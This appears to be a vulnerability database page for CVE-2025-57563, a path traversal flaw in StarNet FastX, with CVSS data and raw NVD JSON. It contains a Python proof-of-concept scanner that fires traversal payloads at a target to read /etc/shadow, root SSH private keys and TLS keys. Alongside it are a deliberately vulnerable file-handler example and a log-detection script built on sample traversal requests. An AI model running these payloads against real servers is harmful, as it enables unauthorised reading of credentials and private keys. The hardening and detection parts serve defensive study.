Security Vulnerability Report
CVE-2025-57563 CVSS 6.5 MEDIUM

Published: 2025-10-14 18:15:36
Last Modified: 2026-04-15 00:35:42

Description

A path traversal in StarNet Communications Corporation FastX v4 through v4.1.51 allows unauthenticated attackers to read arbitrary files. The record does not identify the affected endpoint or request parameter and names no fixed version; check the vendor's FastX release notes before treating a later build as patched.
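The weakness class behind this advisory is CWE-24 style traversal: a file-serving handler joins user input onto a base directory and lets `../` (raw, percent-encoded, double-encoded or with backslashes) climb out of it. The following is an added illustration, not StarNet's code and not the FastX handler; it shows a minimal static-file reader in vulnerable and hardened form against a directory layout constructed for the demo (a public `static/index.html` and a `secret.txt` one level above it).

```python
# Added example: the CWE-24 pattern behind this advisory, as a minimal static-file
# handler in vulnerable and hardened form. Illustrative code, not StarNet's; the
# directory layout and file names are constructed for the demo.
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


def fully_decode(segment: str) -> str:
    """Undo repeated percent-encoding (%2e%2e, %252e%252e, ...) so the path
    check sees the same bytes the filesystem will."""
    prev = None
    while prev != segment:
        prev, segment = segment, unquote(segment)
    return segment


def vulnerable_read(static_root: str, requested: str) -> bytes:
    """Vulnerable: a bare join lets '../' climb out of static_root."""
    path = os.path.join(static_root, requested.lstrip("/"))
    with open(path, "rb") as fh:
        return fh.read()


def safe_read(static_root: str, requested: str) -> bytes:
    """Hardened: decode, unify separators, resolve symlinks and '..', then
    require the resolved target to sit under the resolved root."""
    root = Path(static_root).resolve()
    decoded = fully_decode(requested).replace("\\", "/")
    if "\x00" in decoded:
        raise PermissionError("NUL byte in requested path")
    candidate = (root / decoded.lstrip("/")).resolve()
    if candidate != root and root not in candidate.parents:
        raise PermissionError(f"traversal blocked: {requested!r}")
    if not candidate.is_file():
        raise FileNotFoundError(requested)
    return candidate.read_bytes()


# Encodings a traversal scanner typically tries; none may reach secret.txt.
TRAVERSAL_VARIANTS = [
    "../secret.txt",
    "%2e%2e/secret.txt",
    "%252e%252e/secret.txt",
    "..\\secret.txt",
    "/../secret.txt",
    "....//secret.txt",
]


def demo() -> dict:
    """Constructed sandbox: <tmp>/www/static/index.html is public,
    <tmp>/www/secret.txt sits one level above the static root."""
    base = Path(tempfile.mkdtemp())
    static = base / "www" / "static"
    static.mkdir(parents=True)
    (static / "index.html").write_bytes(b"<html>ok</html>")
    (base / "www" / "secret.txt").write_bytes(b"SECRET")

    leaked = []
    for variant in TRAVERSAL_VARIANTS:
        try:
            leaked.append(safe_read(str(static), variant) == b"SECRET")
        except (PermissionError, FileNotFoundError):
            leaked.append(False)

    return {
        "vuln_escapes": vulnerable_read(str(static), "../secret.txt") == b"SECRET",
        "safe_serves": safe_read(str(static), "index.html") == b"<html>ok</html>",
        "safe_leaks": any(leaked),
    }


if __name__ == "__main__":
    print(demo())
```

The hardened version deliberately compares resolved paths rather than searching the input for `..`: a string filter misses the encoded and `....//` variants, while resolving both root and candidate and checking containment rejects every encoding with one rule and also handles symlinks that point outside the root.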

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
Weakness: CWE-24 (Path Traversal: '../filedir')

Note: this is the only metric in the record and comes from a Secondary (non-NVD) source. It rates confidentiality impact Low (C:L), which is conservative for an unauthenticated arbitrary file read; with C:H the same vector scores 7.5 or higher (HIGH), so do not let the MEDIUM label alone drive prioritization.

Configurations (Affected Products)

No CPE configuration data is available in the NVD record (vulnStatus: Deferred). The version list below follows the range stated in the description (v4 through v4.1.51); it is not vendor-confirmed configuration data.

StarNet FastX v4.0
StarNet FastX v4.1
StarNet FastX v4.1.1
StarNet FastX v4.1.2
StarNet FastX v4.1.3
StarNet FastX v4.1.4
StarNet FastX v4.1.5
StarNet FastX v4.1.6
StarNet FastX v4.1.7
StarNet FastX v4.1.8
StarNet FastX v4.1.9
StarNet FastX v4.1.10
StarNet FastX v4.1.11
StarNet FastX v4.1.12
StarNet FastX v4.1.13
StarNet FastX v4.1.14
StarNet FastX v4.1.15
StarNet FastX v4.1.16
StarNet FastX v4.1.17
StarNet FastX v4.1.18
StarNet FastX v4.1.19
StarNet FastX v4.1.20
StarNet FastX v4.1.21
StarNet FastX v4.1.22
StarNet FastX v4.1.23
StarNet FastX v4.1.24
StarNet FastX v4.1.25
StarNet FastX v4.1.26
StarNet FastX v4.1.27
StarNet FastX v4.1.28
StarNet FastX v4.1.29
StarNet FastX v4.1.30
StarNet FastX v4.1.31
StarNet FastX v4.1.32
StarNet FastX v4.1.33
StarNet FastX v4.1.34
StarNet FastX v4.1.35
StarNet FastX v4.1.36
StarNet FastX v4.1.37
StarNet FastX v4.1.38
StarNet FastX v4.1.39
StarNet FastX v4.1.40
StarNet FastX v4.1.41
StarNet FastX v4.1.42
StarNet FastX v4.1.43
StarNet FastX v4.1.44
StarNet FastX v4.1.45
StarNet FastX v4.1.46
StarNet FastX v4.1.47
StarNet FastX v4.1.48
StarNet FastX v4.1.49
StarNet FastX v4.1.50
StarNet FastX v4.1.51

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-57563 - StarNet FastX Path Traversal PoC
# Vulnerability: Unauthenticated Path Traversal in FastX v4 through v4.1.51
# CVSS: 6.5 (MEDIUM)
# Description: Allows unauthenticated attackers to read arbitrary files
#
# Caveat: the advisory does not name the vulnerable route or parameter, so the
# path prefixes and query parameters below are generic guesses, not documented
# FastX endpoints. A miss does not prove the target is patched.
#
# Caveat: urllib3 1.25 and later (used by requests) collapses literal ".."
# segments in the URL path before the request is sent, so the raw "/../"
# payloads may reach the server already normalized. Percent-encoded and
# query-string variants are not affected. Confirm what is actually on the
# wire (proxy or pcap) or send the raw path with http.client before trusting
# a negative result.
import sys

import requests
import urllib3

# TLS verification is deliberately disabled below; silence the per-request warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "https://target-fastx-server.com"
TARGET_PORT = sys.argv[2] if len(sys.argv) > 2 else 443
TARGET_OS = sys.argv[3] if len(sys.argv) > 3 else "linux"   # "linux" or "windows"

# Path traversal payloads to test (reference list of raw and encoded variants;
# exploit_path_traversal() builds per-file payloads of the same shape)
PAYLOADS = [
    # Linux targets
    "/../../../../etc/passwd",
    "/../../../etc/passwd",
    "/../../etc/passwd",
    "/../etc/passwd",
    "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "/..%2f..%2f..%2f..%2fetc/passwd",
    "/....//....//....//....//etc/passwd",
    "/static/../../../../etc/passwd",
    "/assets/../../../../etc/passwd",
    "/download/../../../../etc/passwd",
    "/file/../../../../etc/passwd",
    "/files/../../../../etc/passwd",
    "/getfile?file=../../../../etc/passwd",
    "/readfile?path=../../../../etc/passwd",
    "/load?file=../../../../etc/passwd",
    "/../etc/shadow",
    "/../../etc/shadow",
    "/../../../../root/.ssh/id_rsa",
    "/../../../../root/.ssh/authorized_keys",
    "/../../../../etc/fastx/fastx.conf",
    "/../../../../opt/fastx/conf/server.xml",
    # Windows targets
    "\\..\\..\\..\\..\\windows\\win.ini",
    "/../../../../windows/win.ini",
    "/../../../../windows/system32/drivers/etc/hosts",
]

# Sensitive files to extract
SENSITIVE_FILES = {
    "linux": [
        "/etc/passwd",
        "/etc/shadow",
        "/etc/hosts",
        "/etc/fastx/fastx.conf",
        "/opt/fastx/conf/server.xml",
        "/root/.ssh/id_rsa",
        "/root/.ssh/authorized_keys",
        "/home/*/.ssh/id_rsa",   # shell-style glob; a web server will not expand it
        "/etc/ssl/private/fastx.key",
    ],
    "windows": [
        "/windows/win.ini",
        "/windows/system32/drivers/etc/hosts",
        "/fastx/conf/server.xml",
    ],
}

# Content markers keyed by requested file, so a hit is judged against what
# that file should contain rather than against any app page mentioning "fastx".
FILE_MARKERS = {
    "/etc/passwd": "root:",
    "/etc/shadow": "root:",
    "/etc/hosts": "localhost",
    "drivers/etc/hosts": "localhost",
    "win.ini": "[fonts]",
    ".ssh/id_rsa": "PRIVATE KEY",
    ".ssh/authorized_keys": "ssh-",
    ".key": "PRIVATE KEY",
}


def looks_like_hit(target_file, content):
    """True if the body looks like the requested file rather than an app page."""
    head = content.lstrip()[:64].lower()
    if head.startswith(("<!doctype", "<html")):   # login/error page, not a file
        return False
    for suffix, marker in FILE_MARKERS.items():
        if target_file.endswith(suffix):
            return marker in content
    return "fastx" in content.lower()   # config files without a fixed marker


def exploit_path_traversal(base_url, target_file):
    """Attempt path traversal to read a specific file"""
    traversal_payloads = [
        f"/..{target_file}",
        f"/../..{target_file}",
        f"/../../..{target_file}",
        f"/../../../..{target_file}",
        f"/../../../../..{target_file}",
        f"/static/..{target_file}",
        f"/assets/..{target_file}",
        f"/download?file=..{target_file}",
        f"/file?path=..{target_file}",
        f"/getfile?f=..{target_file}",
    ]
    for payload in traversal_payloads:
        url = f"{base_url}{payload}"
        try:
            response = requests.get(
                url, timeout=10, verify=False,
                headers={"User-Agent": "Mozilla/5.0"},
            )
        except requests.RequestException:
            continue
        if response.status_code != 200 or not response.content:
            continue
        content = response.text
        if looks_like_hit(target_file, content):
            print(f"[+] SUCCESS - Payload: {payload}")
            print(f"[+] URL: {url}")
            print(f"[+] Content:\n{content[:500]}")
            return content
    return None


def main():
    print("[*] CVE-2025-57563 - StarNet FastX Path Traversal Exploit")
    print(f"[*] Target: {TARGET_HOST}:{TARGET_PORT}")
    print("[*] Severity: MEDIUM (CVSS 6.5)")
    print("-" * 60)
    base_url = f"{TARGET_HOST}:{TARGET_PORT}"

    # Attempt to read sensitive files for the selected OS
    for target_file in SENSITIVE_FILES[TARGET_OS]:
        print(f"\n[*] Attempting to read: {target_file}")
        result = exploit_path_traversal(base_url, target_file)
        if result:
            print("[+] File content retrieved successfully!")
        else:
            print("[-] Failed to retrieve file")


if __name__ == "__main__":
    main()
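The defensive counterpart to the scanner above is spotting the same payload shapes in web-server access logs: literal `../`, percent- and double-percent-encoded dots, backslash separators and the `....//` filter-evasion form. The following is an added example, not part of the advisory or of StarNet's product; the access-log lines are constructed in Common Log Format for the demo, and the port and log layout of a real FastX deployment are assumptions.

```python
# Added example, not part of the advisory: a detection pass over web-server
# access logs for the traversal variants a scanner emits (raw '../',
# percent- and double-percent-encoded dots, backslashes, and '....//').
# The log lines are constructed for this example in Common Log Format.
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)
# Two or more dots followed by a separator, matched after decoding. The '\.\.+'
# form deliberately also catches the '....//' evasion aimed at single-pass filters.
TRAVERSAL_RE = re.compile(r"\.\.+/")
SENSITIVE_RE = re.compile(r"/etc/(passwd|shadow)|\.ssh/|win\.ini|system32", re.I)

# Constructed sample: one benign asset fetch, four traversal attempts from one
# source (two of them answered 200 with a body), and an unrelated login.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Oct/2025:18:20:01 +0000] "GET /static/app.js HTTP/1.1" 200 4821
203.0.113.7 - - [14/Oct/2025:18:20:03 +0000] "GET /static/../../../../etc/passwd HTTP/1.1" 200 1894
203.0.113.7 - - [14/Oct/2025:18:20:04 +0000] "GET /%2e%2e/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 403 -
203.0.113.7 - - [14/Oct/2025:18:20:05 +0000] "GET /download?file=..%252f..%252fetc%252fpasswd HTTP/1.1" 404 0
198.51.100.9 - - [14/Oct/2025:18:21:10 +0000] "GET /login HTTP/1.1" 200 2210
203.0.113.7 - - [14/Oct/2025:18:22:30 +0000] "GET /....//....//....//windows/win.ini HTTP/1.1" 200 92
"""


def canonicalize(target: str) -> str:
    """Decode until stable (handles %2e%2e and %252e%252e alike) and unify
    separators, so one regex covers every encoding the scanner tried."""
    prev = None
    while prev != target:
        prev, target = target, unquote(target)
    return target.replace("\\", "/")


def parse_line(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec


def scan(log_text: str) -> list:
    """One finding per request whose decoded target contains a traversal
    sequence; likely_success marks a 200 with a non-empty body."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        canon = canonicalize(rec["target"])
        if not TRAVERSAL_RE.search(canon):
            continue
        findings.append({
            "src": rec["src"],
            "ts": rec["ts"],
            "raw": rec["target"],
            "canonical": canon,
            "sensitive_target": bool(SENSITIVE_RE.search(canon)),
            "likely_success": rec["status"] == 200 and rec["bytes"] > 0,
        })
    return findings


def hits_by_source(findings: list) -> dict:
    counts = {}
    for f in findings:
        counts[f["src"]] = counts.get(f["src"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        flag = "SUCCESS?" if f["likely_success"] else "blocked"
        print(f"{f['ts']} {f['src']} {flag} {f['canonical']}")
    print(hits_by_source(results))
```

Decode-until-stable before matching is the important step: a rule written against the raw request line sees `%252e%252e` as harmless, while the server may decode it twice. A 200 with a body on a sensitive target is the line to escalate; a burst of 403/404 traversal attempts from one source is still worth a block, since the scanner keeps guessing routes until one answers.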

References

https://gitlab.com/daniele_m/cve-list/-/blob/main/README.md?ref_type=heads
https://www.starnet.com/fastx/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57563", "sourceIdentifier": "[email protected]", "published": "2025-10-14T18:15:36.033", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal in StarNet Communications Corporation FastX v.4 through v4.1.51 allows unauthenticated attackers to read arbitrary files."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-24"}]}], "references": [{"url": "https://gitlab.com/daniele_m/cve-list/-/blob/main/README.md?ref_type=heads", "source": "[email protected]"}, {"url": "https://www.starnet.com/fastx/", "source": "[email protected]"}]}}